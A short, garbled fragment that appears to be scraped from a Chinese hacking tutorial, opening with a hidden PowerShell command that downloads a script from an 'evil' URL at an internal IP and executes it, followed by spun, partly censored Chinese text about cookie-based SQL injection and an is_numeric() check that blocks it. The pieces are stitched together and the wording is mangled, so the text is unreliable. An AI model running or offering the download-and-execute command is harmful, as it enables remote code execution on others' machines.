powershell.exe -nop -w hidden -c“IEX（（new-object net.webclient）.downloadstring（'http://172.16.17.39:80/evil'））”这儿咱们能够运用一种更为高档的注入 *** ——cookie注入。 cookie注入其原理也和平常的注入相同，仅仅将参数以cookie的 *** 提交，而一般的注入咱们大都是运用get *** 提交，get *** 提交便是直接在网址后边加上需求注入的句子。 }

User=账户别的还能够发现，在履行查询之前，运用了if句子进行判别，判别的条件是一个is_numeric()函数，也便是判别用户输入的数据是否是数字型，只需不是数字型就一概报错，这样那些and、or、select等句子都无法履行了。